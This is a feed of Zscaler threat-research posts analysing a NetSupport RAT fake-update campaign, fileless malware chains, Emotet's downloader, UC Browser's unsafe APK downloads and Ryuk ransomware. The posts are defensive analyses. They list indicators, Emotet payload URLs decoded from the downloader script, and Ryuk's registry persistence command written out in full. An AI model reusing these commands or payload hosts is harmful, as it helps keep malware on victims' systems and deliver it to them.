Security Posts

NetSupport RAT installed via fake update notices

Zscaler Research - 52 min 35 sec ago
Recently, the Zscaler ThreatLabZ team came across two campaigns designed to trick users into downloading a Remote Access Trojan (RAT) via a fake Flash Player update and a font update. These campaigns are designed to inject malicious redirector scripts into compromised content management system (CMS) sites. These sites use popular programs, such as WordPress, Joomla, Drupal, and others, and are being attacked as a result of vulnerabilities introduced by plugins, themes, and extensions, something we’ve discussed previously on this blog. The two malware campaigns we examine in this blog deliver a payload designed to steal sensitive information. The following figure depicts the hits on the various compromised sites. Overall, Zscaler has blocked nearly 40,000 of these attempts in the past three months. Figure 1: The number of hits on the various types of compromised CMS sites: WordPress (green), Joomla (gold), Drupal (blue), and other CMS sites (orange) Method 1: Fake Flash Player update campaign In this attack, cybercriminals hacked WordPress sites using the theme plugin vulnerability and injected two malicious redirect scripts in the compromised site. By using either one of the scripts, the attackers will deploy malware at the user’s end. The injected script will redirect to the malware site and download the fake update template script to show a fake Flash Player update alert to the user over the compromised site. Figure 2: A compromised WordPress site with the fake Flash Player update page   The following figure shows the source code of the compromised website with the injected scripts. Figure 3: The injected redirector scripts in a compromised CMS site   The first injected script will direct the user to click.clickanalytics208[.]com to download the fake update template. If it fails to meet the attacker's checkpoints, such as geolocation and network settings, then it will execute the next injected script. Figure 4: The first injected malicious script redirects to the click.clickanalytics208[.]com site   The second injected script will redirect to the chrom-update[.]online site and will download the fake update template script from the malicious site. Figure 5: The second injected malicious script redirects to the chrom-update[.]online site   The attacker will send the template.js file as a layer of the compromised site with a fake update page. The fake update page template will be displayed based on the particular variable’s value, also called a “banner.” Figure 6: The default template.js code [banner value = 1: browser update; 2: font; 3: Flash]   The fake template page will display an alert to try to trick the user into starting the update. Once the user clicks the "Update" button, the script downloads the malicious HTA file from the specified URL.  Figure 7: A fake Flash Player update page with the link to download malicious HTA file   If the user clicks the "Later" button, the redirect still occurs, taking the user to the same page to download the malicious HTA file. The following figure depicts the source code of the template.js with the link to download the malicious HTA file with the banner value 3. Figure 8: The source code of the template.js script from the redirection URL (chrome-update[.]online)   Once the user runs the HTA file, it will also run the PowerShell application using the command prompt and download the RAT payload from the specified URL. Figure 9: The source code of the downloaded malicious HTA file   Figure 10: The obfuscated content responsible for the malware download   Figure 11: The deobfuscated code showing the download link   Figure 12: Step 1 of the malware payload installation process   Figure 13: Step 2 of the malware payload installation process   Figure 14: The NetSupport RAT malware running as a client-side application   Finally, the installed RAT malware will send the victim's information in an encrypted format to the attacker’s site (hxxp://179.43.146[.]90/fakeurl.htm) to enable remote access of the victim’s machine, as shown in Figure 15 below. Figure 15: The captured user data is transferred to the attacker’s site in an encrypted format Figure 16: The overall traffic of the fake Flash Player update malware campaign   The attackers were also tracking the visitor count, as shown in Figure 17 below. So far, 113,000 unique users were affected by this malware attack. Figure 17: The affected user count   Method 2: Fake font update campaign In this attack, the cybercriminals will directly inject the fake update template script by exploiting the legitimate site to evade detection. As mentioned earlier, the template script logic will identify which browser is being used. While accessing the compromised site via Chrome, the user will receive an alert that the “PT Sans” font wasn’t found.   Figure 18: The compromised site with a fake font update page (Chrome)   The same site was accessed via Firefox and shows the same alert to the user in the Firefox template. Figure 19: A compromised site with a fake font update page (Firefox)   The following image shows the source code of the compromised site with the injected template script.   Figure 20: The template.js is injected directly into the compromised site   The source code of the template.js script shows a banner value “2” and has a link (sreex[.]info/update.exe) to download the malware payload. Figure 21: The source code of the template.js script with the malware download link   Figure 22: After clicking the update button, the malware payload will be downloaded (via update.exe)   The following activities were observed while executing the downloaded Trojan. Figure 23: The program created a process “gdsun.exe”  from the malware payload (a self-copy of the payload)   Figure 24: The malware creates a copy of the payload in the %ProgramData%/ folder   Figure 25: It also creates a startup registry entry for the dropped malware   It will post the following collected user data to (clickies(.)site/CC/index(.)php), which is operated by the attackers. Figure 26: Post-infection callback traffic   Figure 27: The overall traffic of the fake font update campaign   Conclusion In today's digital world, a company's website is its most valuable asset. Therefore, it is critically important for companies to protect this public face from an attack that could put your business, employees, and your customers at risk. Zscaler has blocked more than 40,000 malicious attacks related to this campaign in the past three months. Figure 28: The Zscaler Risk Analyzer score for the malware payload download URL   IOCs URLs: click.clickanalytics208(.)com chrom-update(.)online asasasqwqq(.)xyz bitbucket(.)org/execuseme1/1312/downloads/download.hta xyxyxyxyxy(.)xyz/wwwwqwe/11223344.exe 179(.)43(.)146(.)90/fakeurl(.)htm sygicstyle(.)xyz sreex(.)info/update(.)exe clickies(.)site/CC/index(.)php   Malware payload: 5ad69da64dacdf87c5bdea12a20ca8fd4d34e6a16c37dfbb9a2af8df79901504(download.hta) 9c69a1d81133bc9d87f28856245fbd95bd0853a3cfd92dc3ed485b395e5f1ba0(11223344.exe) ea137c0079624de8d2f8b174d44f90faa58c4eda558f7d5db0efa742f36c2cdf(update.exe)  
Categories: Security Posts

Fileless malware campaign roundup

Zscaler Research - 52 min 35 sec ago
Criminals frequently get caught because they leave evidence at the scene of the crime—fingerprints, DNA, and the like. Cybercriminals are no different, often leaving files behind on the systems they infect. In an effort to reduce the evidence left behind after an attack, cybercriminals developed fileless malware, a variant of computer-related malicious software that exists exclusively as a computer memory-based artifact. In short, the infection or malware does not write any executable files to the infected system’s hard drive. By leaving few traces behind, malware authors try to postpone detection by security vendors for as long as possible.  During the past few years, the use of fileless infection has been adopted by numerous forms of malware and advanced persistent threats (APTs). These fileless infection chains can employ multiple techniques to deliver the final payload. In one example, the Kovter Trojan stored the payload in a Windows registry. The Hancitor Trojan wrote a payload in the hollow process spawned by shellcode injected from a Word document macro in a Microsoft Word process. Lately, we have been seeing an increase in fileless infection techniques that are leveraging legitimate applications available in the victim’s machine. These techniques do not rely on storing executable files and leave no direct traces on disks, making detection and removal a challenge. In this blog, we will discuss the recent malware campaigns that have used fileless infection mechanisms leveraging legitimate applications. Figure 1: Stats showing hits of fileless infection chains Case 1: njRat Backdoor Although njRat has been around for a long time, we recently observed that this backdoor is being loaded by a fileless infection chain. A .docx file is received as an attachment in a phishing email by the victim. Once the .docx file is opened, the infection cycle begins. Figure 2: The njRat payload loaded by fileless infection   The .docx file contains external references to remote OLE objects to be referenced in the “document.xml.rels,” which is a Rich Text Format (RTF) exploit CVE-2017-0199 that further opens the embedded .doc file containing a Visual Basic for Applications (VBA) macro. Figure 3: The .docx downloading an RTF file   The VBA macro contains an encoded PowerShell script. It downloads the VBScript from “www[.]m9c[.]net/uploads/15676549681.jpg.”  The VBScript then decodes and executes the embedded PowerShell script. The PowerShell script then downloads the encrypted Portable Executable (PE) file from “www[.]m9c[.]net/uploads/15676547971.jpg,” which is the njRat executable. Figure 4: The VBS PowerShell downloads an encoded PE file This VBScript decrypts the PE file, which is a .NET executable that is directly loaded in the memory and runs in the context of an MSbuild.exe. No traces of a disk write are observed and the backdoor njRat silently executes under the hood by communicating with the CnC server “borapegar147[.]ddns[.]net”.   Case 2: Sodinokibi Ransomware The Sodinokibi ransomware (also known as REvil) is one of the most well-known ransomware types in the wild today. It has been on the rise since the threat group behind the malware operation GandCrab announced that it had shut down its operations at the end of May. Recently, we have noticed that Sodinokibi has adopted a fileless mechanism. Figure 5: The Sodinokibi payload loaded by a fileless infection   The fileless infection cycle starts when the victim clicks the BAT file that is received as an attachment in a phishing email. The BAT file contains a PowerShell script containing Base64 encoded expressions. Figure 6: The BAT file received via MalSpam   As shown below in the decoded PowerShell script, this script downloads another PowerShell script containing more than 3,000 lines of code and a Base64-encoded portable executable file (PE) from a pastebin URL and loads it while invoking a function that initiates the attack in the system's memory. Figure 7: The decoded PowerShell expressions   Figure 8: The encoded PE file in PowerShell downloaded from the pastebin This script decodes and provides the PE file to a loader function, which takes care of injecting this file directly into the system's memory. The loaded PE file, which appears to be a DLL, is actually Sodinokibi ransomware. We see no traces of the DLL being saved on the disk as the ransomware silently starts encrypting files on the system.   Case 3: Astaroth Backdoor The Astaroth Trojan is known for stealing credentials, keystrokes, and other system information. An analysis of the backdoor and the infection cycle is covered in detail by Microsoft. The infection chain starts with a victim clicking on an LNK file that is delivered via a phishing email. This LNK file contains an obfuscated WMIC command, which downloads an XSL file containing obfuscated JavaScript.   Figure 9: The obfuscated WMIC command   This JavaScript code downloads a Base64-encoded payload by abusing the Bitsadmin tool and decodes it using the Certutil tool. The payloads are XOR-encrypted PE files except one of the DLL files, which is loaded by leveraging the Regsvr32 tool. Finally, this DLL file decrypts the payload of the backdoor Astaroth and maps it in the Windows userinit process. Figure 10: Obfuscated JavaScript in an XSL file   During the entire attack chain, only system utilities are leveraged to load the final payload. The Astaroth payload executes silently without traces on the filesystem. The case studies described above are based on techniques that take advantage of legitimate applications, such as PowerShell and Windows Management Instrumentation (WMI). However, there are other techniques in which the payload is stored in the registry and delivered by taking advantage of zero-day vulnerabilities in applications or in the operating systems themselves. In one example, the famous Equifax breach used a vulnerability in Apache Struts to deliver the payload. As the PowerShell scripts were stored in the registry, there was no direct trace of the malware being stored.   Conclusion Fileless infection campaigns are difficult to detect. That's why the Zscaler ThreatLabZ team continually monitors malware delivery mechanisms from several sources to ensure that Zscaler customers are protected.     
Categories: Security Posts

Emotet is back in action after a short break

Zscaler Research - 52 min 35 sec ago
It’s common for cybercriminals to launch an attack, then shortly thereafter stop the campaign before they are detected. These breaks also give these bad actors a chance to change tactics to, once again, attempt to avoid detection. That’s what operators using the Emotet malware did, taking a short break before bringing Emotet back in a new, more dangerous form. Emotet operators took about a two-month break as command and control (C&C) servers went down in late May and came back online around the end of August. Then, we began observing a new version of this malware around mid-September. Emotet started as a banking trojan in 2014. However, it has morphed into a very prominent threat. Now, it is mostly used for spamming and downloading additional malware threats on a target system. Based on the unique sample count of malware threats seen by the Zscaler Cloud Sandbox, Emotet and its downloaders appear to be among the most prevalent threats in 2019, followed by banking trojans and loaders, such as TrickBot and Ursnif, remote-access trojans (RATs), and off-the-shelf password stealers, such as LokiBot and AZORult. Emotet is modular by design, as it supports multiple modules for different tasks, such as stealing information, spamming, and more. It is also known to download and to be downloaded by other malware families, such as TrickBot and Ursnif. It has also been associated with the Ryuk ransomware.   Email conversation hijacking This year, Emotet employed a new tactic of using stolen email content in spam campaigns. The hijacking of existing email threads can be very effective as recipients are tricked into believing that the email was sent by the other person in the email thread. This trust factor can lead to the victim opening the email (and attachment) and getting infected with Emotet, effectively making the infected system part of an Emotet botnet. Figure 1: Emotet activity from the beginning of June 2019 to mid-September 2019. Figure 2: The new Emotet campaign after the break.   New campaign, new document templates, and new botnets? We observed the following new templates in spammed malicious documents (maldocs) during this new campaign.    Figures 3 and 4: New macro templates (Product Notice and Protected View)   Earlier, there were two Emotet botnets, known as Epoch 1 (E1) and Epoch2 (E2), that were using unique RSA keys to communicate with their C&C. After the break, we noticed three new RSA keys being used, which suggests the possibility of a botnet splitting into multiple botnets. Earlier keys were no longer seen in use and the latest three keys are now being used, which means operators are reorganizing their botnet infrastructure. Already existing RSA keys  -----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAMPLgcO0RQdJg/LTgiku57nH4KcLwHCx\nS0lbynOUhHhKjTnmENrMA2idUbK6hI0JRZtii9oJSlb3e5NZiCK+Qr/NB2u7ZNRc\nhG87aibm0ndS9xKDRXcmWwaQkF0PFuOHpwIDAQAB\n-----END PUBLIC KEY----- -----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAL9KRKWqcld40xbUZ6hRh+fPNkgJe7K+\n0y1rR0UFqc2SBmnyoR/2Ctd+8MRvU8zri2eNVkVBxCUH1Cthf3AEgRqY2kGva8gJ\nWcqls3j7RztZzqFoL+wM9DNnz/OWuiyPAQIDAQAB\n-----END PUBLIC KEY----- New RSA keys -----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhALk+KlHgOKXm9eDkWu2yN9lanjwOm6W2\nPV0tgr4msNVby2pOJ6S1MZQnQwxl7y6WWzT4kveAQhLmW8JB2M2PDOxZOgVMJH2C\nAtkVW1p/P9jNJWVvjK9SmrbLdIeiKNtRfQIDAQAB -----END PUBLIC KEY----- -----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM426uN11n2LZDk/JiS93WIWG7fGCQmP\n4h5yIJUxJwrjwtGVexCelD2WKrDw9sa/xKwmQKk3b2fUhwnHXjoSpR7pLaDo7pEc\niJB5y6hjbPyrSfL3Fxu74M2SAS0Arj3uAQIDAQAB -----END PUBLIC KEY----- -----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB\nKZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0\nh4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB -----END PUBLIC KEY----- Figure 5: Emotet RSA keys used before and after the break. RSA1 and RSA2 were used before the break. In this new campaign, we saw Emotet using RSA3, RSA4, and RSA5. (1, 2, 3, 4, and 5 are assigned based on their first observation sequence in the wild). Before the break, the two RSA keys didn't share any C&C infrastructure. In this new campaign, two sub-botnets are sharing some infrastructure (as shown in the following screenshots). Figure 6: Emotet RSA keys and C&C infrastructure before the break. Figure 7: RSA keys and C&C infrastructure of the new Emotet campaign. If we check the overall C&C infrastructure and RSA key relationships before and after the break, we can clearly see a reorganization of the C&C infrastructure, which is now divided among three new Epochs. One Epoch is divided into two while the other one is used to create a single botnet with some new C&Cs. Figure 8: The Emotet RSA key and C&C infrastructure relationships before and after the break.   Emotet Downloader payload - Technical analysis The Emotet infection cycle generally starts with spam emails containing malicious macro documents that drop a JavaScript file. This JavaScript file further downloads the Emotet payload from a compromised WordPress website. Almost all the samples we observed were served from compromised WordPress websites (mostly version 5.2.3).  We will take a look at one such malicious document for the purpose of analysis here -  MD5 – 359696113a2156617c28d4f79cc7d44b (“file 20190924 LTR6051.doc”) The macro in the documents is quite simple and straightforward but contains lots of junk. Figure 9: Macro code containing junk instructions.   After removing the junk, this is how the macro code looks. Figure 10: Cleaned macro code.   It gets its text from TextBox1 in UserForm2, then saves that in a "JS" file before executing that file. Figure 11: A user form containing javascript code.   This JavaScript file is heavily obfuscated. More obfuscation is being added to the "JS" code incrementally. As in earlier versions of this downloader, some of the strings and function names were readable and now almost every string is obfuscated. Figure 12: Heavily obfuscated script This script contains an array of strings in variable “a.” First, the elements of the array are shuffled using an anonymous function just after the array definition. Then there is function “b,” which is used to decrypt strings and is extensively used throughout the script. Using this function, we can log the decrypted strings just before they return. Some of the interesting strings include: \+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d)) while (true) {} return (function() {}.constructor("return this")( ) 4|0|7|5|3|1|8|2|6 2|1|0|6|3|5|4 split debug error exception trace http://thewomentour.com/wp-includes/f8yezb9/ WScript.Shell ResponseBody ActiveXObject https://www.marquedafrique.com/k9c5qh/eb1wiw8192/ Scripting.FileSystemObject CreateObject https://thecrystaltrees.com/nofij3ksa/o5523/ http://4excellent.com/wp-includes/ii950106/ WScript.Shell Popup MSXML2.XMLHTTP GET open send http://www.davidleighlaw.com/wp-content/wlfsj15707/ Position Open Type SaveToFile random toString substr 0|1|3|4|2 11|15|13|4|6|9|8|7|5|0|2|3|1|10|16|14|12 return (function() {}.constructor("return this")( ) 7|2|8|0|5|1|4|6|3 2|0|3|4|1 0|14|11|8|3|6|13|9|5|2|1|12|4|10|7 Not Supported File Format There was an error opening this document. The file is damaged and could not be repaired (for example, it was sent as an email attachment and wasn't correctly decoded). The script's functionality can be clearly determined from the decrypted strings. It downloads, saves, and runs its payload from a list of URLs and shows the following message box to trick a user into believing the file is corrupt: Figure 13: An error message to trick a user into believing the file is corrupt. There are multiple URLs embedded in the script files. The following URLs were extracted from this script: http://thewomentour[.]com/wp-includes/f8yezb9/https://www[.]marquedafrique[.]com/k9c5qh/eb1wiw8192/https://thecrystaltrees[.]com/nofij3ksa/o5523/ http://4excellent[.]com/wp-includes/ii950106/http://www[.]davidleighlaw[.]com/wp-content/wlfsj15707/ In this case, the Emotet loader is downloaded from “http://thecrystaltrees[.]com/nofij3ksa/o5523/” (MD5 – 402b20268d64acded1c48ce760c76c47). The Emotet loader already has been extensively analyzed and blogged about, so we won't be getting into technical details of the loader here. Below are artifacts extracted from this sample: RSA key extracted from this sample: -----BEGIN PUBLIC KEY-----\nMHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB\nKZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0\nh4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB\n-----END PUBLIC KEY----- C&C server addresses from the sample: 187[.]188[.]166[.]192:80, 200[.]57[.]102[.]71:8443, 200[.]21[.]90[.]6:8080, 46[.]41[.]134[.]46:8080, 178[.]249[.]187[.]151:8080, 217[.]199[.]160[.]224:8080, 71[.]244[.]60[.]230:7080, 119[.]59[.]124[.]163:8080, 185[.]86[.]148[.]222:8080, 190[.]230[.]60[.]129:80, 178[.]79[.]163[.]131:8080, 186[.]83[.]133[.]253:8080, 179[.]62[.]18[.]56:443, 91[.]205[.]215[.]57:7080, 217[.]113[.]27[.]158:443, 181[.]36[.]42[.]205:443, 190[.]19[.]42[.]131:80, 183[.]82[.]97[.]25:80, 77[.]245[.]101[.]134:8080, 109[.]104[.]79[.]48:8080, 159[.]203[.]204[.]126:8080, 5[.]77[.]13[.]70:80, 189[.]187[.]141[.]15:50000, 46[.]28[.]111[.]142:7080, 46[.]21[.]105[.]59:8080, 189[.]166[.]68[.]89:443, 183[.]87[.]87[.]73:80, 190[.]200[.]64[.]180:7080, 79[.]143[.]182[.]254:8080, 119[.]92[.]51[.]40:8080, 187[.]155[.]233[.]46:443, 89[.]188[.]124[.]145:443, 201[.]163[.]74[.]202:443, 62[.]75[.]160[.]178:8080, 51[.]15[.]8[.]192:8080, 46[.]29[.]183[.]211:8080, 62[.]75[.]143[.]100:7080, 114[.]79[.]134[.]129:443, 190[.]230[.]60[.]129:80, 190[.]117[.]206[.]153:443, 203[.]25[.]159[.]3:8080, 217[.]199[.]175[.]216:8080, 80[.]85[.]87[.]122:8080, 190[.]1[.]37[.]125:443, 23[.]92[.]22[.]225:7080, 81[.]169[.]140[.]14:443, 46[.]163[.]144[.]228:80, 5[.]196[.]35[.]138:7080, 189[.]129[.]4[.]186:80, 151[.]80[.]142[.]33:80, 190[.]221[.]50[.]210:8080, 190[.]104[.]253[.]234:990, 71[.]244[.]60[.]231:7080, 91[.]83[.]93[.]124:7080, 181[.]81[.]143[.]108:80, 181[.]188[.]149[.]134:80, 50[.]28[.]51[.]143:8080, 123[.]168[.]4[.]66:22, 211[.]229[.]116[.]97:80, 201[.]184[.]65[.]229:80, 77[.]55[.]211[.]77:8080, 212[.]71[.]237[.]140:8080, 190[.]38[.]14[.]52:80, 46[.]41[.]151[.]103:8080, 149[.]62[.]173[.]247:8080, 87[.]106[.]77[.]40:7080, 86[.]42[.]166[.]147:80, 109[.]169[.]86[.]13:8080, 88[.]250[.]223[.]190:8080, 138[.]68[.]106[.]4:7080, 200[.]58[.]171[.]51:80 Conclusion Emotet is an ever-evolving threat, employing new tricks and tactics. Although it started as a banking trojan, Emotet is now associated with several different malware campaigns, including ransomware and infostealers. The Zscaler ThreatLabZ team proactively tracks and ensures coverage to block downloaders, payloads, and C&C activity from Emotet and other threats. ThreatLabZ is the research division of Zscaler. To learn more about ThreatLabZ and Zscaler cloud activity, visit https://www.zscaler.com/threatlabz/cloud-activity-dashboard
Categories: Security Posts

UC Browser app abuses may have exposed 500 million users

Zscaler Research - 52 min 35 sec ago
Recently, when examining the Zscaler cloud for unusual activity, ThreatLabZ researchers found some questionable hits in relation to a particular domain: 9appsdownloading[.]com. Upon analysis, we found these requests being made from a popular browser that's available on Google Play and has more than 500 million downloads to date: the UC Browser app.    Fig. 1: UC Browser on Google Play   As we began to analyze the UC Browser app, we found that the requests were being made to download an additional Android Package Kit (APK) over an unsecured channel (HTTP over HTTPS). Downloading and/or updating components from a third-party source violates Google Play policy, which states: “An app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play.” We decided to explore further into the UC Browser app and found the following issues, which will be discussed in detail in this blog:   Downloading an additional APK from a third party – in violation of Google Play policy Communication over an unsecured channel – opening doors to man-in-the-middle attacks Dropping an APK on external storage (/storage/emulated/0) – allowing other apps, with appropriate permissions, to tamper with the APK We found another app called UC Browser Mini from the same developer with the same functionality and issues, and it dropped the same additional APK from a remote server. The screenshot below shows UC Mini on Google Play.   Fig. 2: UC Browser Mini (UC Mini)   It is important to note that these issues have the potential to affect millions of Android users because the UC Browser app has been downloaded 500 million+ times and UC Mini has been downloaded 100 million+ times. The ThreatLabZ team has been in contact with Google, whose teams are investigating the apps.  Timeline: August 13, 2019: Zscaler reported policy violation to Google. August 13, 2019: Google promptly responded. Case assigned to an investigation team.  August 13 – September 25, 2019: Follow-up emails with research details. September 27, 2019: Google confirmed policy violation by UC Browser and UC Mini. Google contacted UC developers to update the apps and remediate the policy violation.  Update: After Google's intervention, the Zscaler research team noticed that the latest version of both the apps, UC Browser and UC Mini, have stopped downloading the third-party app store.   Technical Details of UC Browser Name: UC Browser Package Name: com.UCMobile.intl Installs: 500,000,000+ (500M +) Developer: UCWeb Singapore Pte. Ltd.   1. Downloading an APK from a third party Upon finding the UC Browser app as the main culprit, we decided to dig deeper into our analysis of the app. As soon as the app is installed, it displays basic activities (Android screens) to set up default language, topics of interest, location, and so on.  Fig. 3: UC Browser app icon and initial Android activity   After some initial requests for news and notifications, the app sends multiple requests with redirections and finally drops an APK on to the user’s device. The screenshot below illustrates the chain of requests and redirects taking place:    Fig. 4 Unsecured requests for APK download   This functionality of dropping another APK from a third-party source clearly violates Google Play’s policy, which includes the following: “An app distributed via Google Play may not modify, replace, or update itself using any method other than Google Play's update mechanism. Likewise, an app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play. This restriction does not apply to code that runs in a virtual machine and has limited access to Android APIs (such as JavaScript in a webview or browser).” During our analysis, we found the APK being dropped on external storage but we did not find the APK being installed. It is possible that this functionality is still under development or there may be other reasons it wasn’t installed, such as exception, disabled unknown-sources option, or rooted device.    2. Communication over an unsecured channel  The APK was downloaded over an unsecured channel (HTTP over HTTPS), opening the possibility for man-in-the-middle (MiTM) attacks. In our research, we came across a recent Dr. Web blog post that talks about similar issues they saw with UC Browser downloading and installing libraries from remote servers. In that case, they talk about libraries being downloaded over HTTP and, in our case, we saw a completely new APK being dropped (this APK is also analyzed in the latter part of this blog).  The consequences of downloading and installing components over unsecured channels were well addressed in the Dr. Web blog, along with the MiTM vulnerability, so we will not address those issues further. We noticed that the app analyzed by Dr. Web researchers had the same icon as our sample, but had a different full-name and a different developer. The screenshots below show the Dr. Web sample (left) compared to the Zscaler sample (right): Fig. 5: UC Browser app samples: Dr. Web (left) and Zscaler (right)    It could be that the same app had been uploaded again on Google Play with a different name and developer along with modified or enhanced code to download additional APKs.    3. Dropping an APK on external storage We also noticed that the additional APK being dropped by this app is stored on external storage, which is world-readable by default. The screenshot below shows the location of the dropped APK: Fig. 6: Dropped APK storage location An APK being placed on external storage, or any other app with storage permission (android:name=android.permission.READ/WRITE_EXTERNAL_STORAGE) can have access to this location and can tamper with the downloaded APK.    Analysis of the dropped APK During our analysis, we noted that UC Browser was dropping the APK but not installing it. It is unclear whether this is due to the fact that the functionality is still under development or if there is another reason the APK is not installing. But we did want to find out what the APK contained, so we decided to manually install it and have a look inside. To our surprise, we found that the APK was actually a third-party app store named “9 Apps” with the package name com.mobile.indiapp.     Fig. 7: 9Apps app install process   After installing the app, it scans the device for installed apps. The app’s scanning and further activities can be seen in the screenshots below: Fig. 8: 9Apps initial activities   We also saw several adult apps available for download in this third-party app store. These apps can be seen in the screenshot below:    Fig. 9: Adult apps on 9Apps store   We tried downloading a small-sized app from the 9Apps store and, to our surprise, the app was downloaded from 9appsdownloading[.]com. This is the same domain that we mentioned at the beginning of this blog. The screenshot below shows the functionality in action:    Fig. 10: Sample APK download requests   Further scrutiny of Zscaler cloud traffic showed multiple requests for APK downloads from this 9appsdownloading[.]com domain. Within the last month, we found 130+ such requests. The hits can be seen in the Zscaler cloud dashboard:  Fig. 11: Zscaler dashboard showing the domain’s activity   Conclusion The tactics used by UC Browser and UC Mini violate Google Play security policies and make it possible for any malicious app to gain entry into a user's device. While 9Apps, an app store for Android apps, is not a malicious site, we searched the domain using VirusTotal, which showed a number of detections: Fig. 12: VirusTotal search for the domain   It is too early to determine exactly what the UC Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat. Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can become victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications. The UC Browser app’s use of unsecured channels also allows attackers to install an arbitrary payload on a device that can perform a variety of activities, such as display phishing messages designed to steal personal data, including usernames, passwords, and credit card numbers. Once a user device has been compromised, and that compromised device connects back at the office, attackers have the ability to establish a foothold in your network, so they can snoop, spread malware, or steal data.   
Categories: Security Posts

Examining the Ryuk Ransomware

Zscaler Research - 52 min 35 sec ago
Ryuk ransomware had a disturbingly successful debut, being used to hit at least three organizations in its first two months of activity for more than $640,000 in ransom. Several attacks followed, where the attackers demanded even greater amounts of ransom.    The attackers were able to demand and receive high ransoms because of a unique trait in the Ryuk code: the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By carrying out these actions, the attackers could disable the Windows System Restore option, making it impossible for users to recover from the attack without external backups. Unlike other ransomware, Ryuk is distributed by common botnets, such as Trickbot and Emotet, which have been widely used as banking trojans. In this blog, we'll provide an analysis of how the Ryuk ransomware can encrypt a victim's data while blocking the infected system from restoring the data.    Analysis Ryuk dropper contains both 32-bit and 64-bit payloads. The dropper checks to see if it is being executed in a 32-bit or 64-bit OS using the "IsWow64Process" API and drops the payload accordingly. It also checks the version of the operating system. If it is executed in Windows XP, it drops the Ryuk payload at "C:\Documents and Settings\Default User\{random-5 char}.exe". If it is executed in Windows Vista or later versions of Windows, it drops the file at "C:\users\Public\{random-5 char}.exe”. Next, it executes the payload using the ShellExecuteW API.   Persistence mechanism Ryuk adds the following registry key so it will execute at every login. It uses the command below to create a registry key: ""C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\{random-5 char}.exe" /f"   Process injection Ryuk injects its main code into several remote processes. Ryuk enumerates the process by calling the CreateToolhelp32Snapshot API and injecting its code in all the processes except the ones named explorer.exe, lsaas.exe and csrss.exe, telling it that it should not be executed by the NT AUTHORITY. Ryuk ransomware terminates processes and stops services contained on a predefined list. These processes and services are mostly antivirus tools, databases, backups, and other software. The screenshot below shows the list of services stopped by Ryuk. Figure 1: The list of services disabled by the Ryuk ransomware. The screenshot below shows the list of processes terminated by Ryuk. Figure 2: The list of processes terminated by the Ryuk ransomware. Ryuk also deletes shadow copies and other backup storage files by using a .BAT file so that the infected system can’t restore data. Below is the list of commands used by Ryuk to perform these deletions. Figure 3: The list of commands used by Ryuk ransomware to delete shadow copies and other backup storage files.   Encryption and similarity with Hermes ransomware Ryuk uses a combination of RSA (asymmetric) and AES (symmetric) encryption to encrypt files. Ryuk embeds an RSA key pair in which the RSA private key is already encrypted with a global RSA public key. The sample generates an AES-256 key for each file and encrypts the files with an AES key. Further, the AES key is encrypted with an embedded public key and is appended at the end of the encrypted file. If all the samples contain the same RSA key pair, then after getting access to one private key, it's easy to decrypt all of the files. But Ryuk contains a different RSA key pair for every sample. Some samples append the ".RYK" extension and some don't append any extensions after encrypting the files. Ryuk has a common feature with Hermes ransomware. During encryption, Ryuk adds a marker in the encrypted file using the keyword “HERMES”. Ryuk checks for the HERMES marker before encrypting any file to know if it has been already encrypted. The screenshot below displays the HERMES marker and encrypted AES key appended at the end of the encrypted file. Figure 4: The HERMES marker and the encrypted AES key. Ryuk encrypts files in every drive and network shared from the infected system. It has whitelisted a few folders, including “Windows, Mozilla, Chrome, Recycle Bin, and Ahnlab” so it won’t encrypt files inside these folders. Ryuk drops its ransom note, named RyukReadMe.txt, in every directory. Ryuk asks for the ransom in bitcoin, providing the bitcoin address in the ransom note. Ryuk contains different templates for the ransom note. Below is a screenshot for RyukReadMe.txt file. Figure 5: Ryuk ransomware ransom note. After completing the encryption, Ryuk creates two files. One is “Public” and contains an RSA public key while the second is “UNIQUE_ID_DO_NOT_REMOVE” and contains a unique hardcoded key.   Conclusion While most ransomware is spread using spam email and exploit kits, Ryuk is delivered as a payload of the Emotet and Trickbot malware. Looking at the encryption process and ransom demands, Ryuk is targeting big enterprises in the hopes of large payoffs. Zscaler ThreatLabZ team continues to monitor this threat to ensure that Zscaler customers are protected.   IOCs MD5 5AC0F050F93F86E69026FAEA1FBB4450 6CDCB9F86972EFC4CFCE4B06B6BE053A 31BD0F224E7E74EEE2847F43AAE23974 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  Rajdeepsinh Dodia and Amandeep Kumar are security researchers on the Zscaler ThreatLabZ team.
Categories: Security Posts

Magecart hits again, leveraging compromised sites and newly registered domains

Zscaler Research - 52 min 35 sec ago
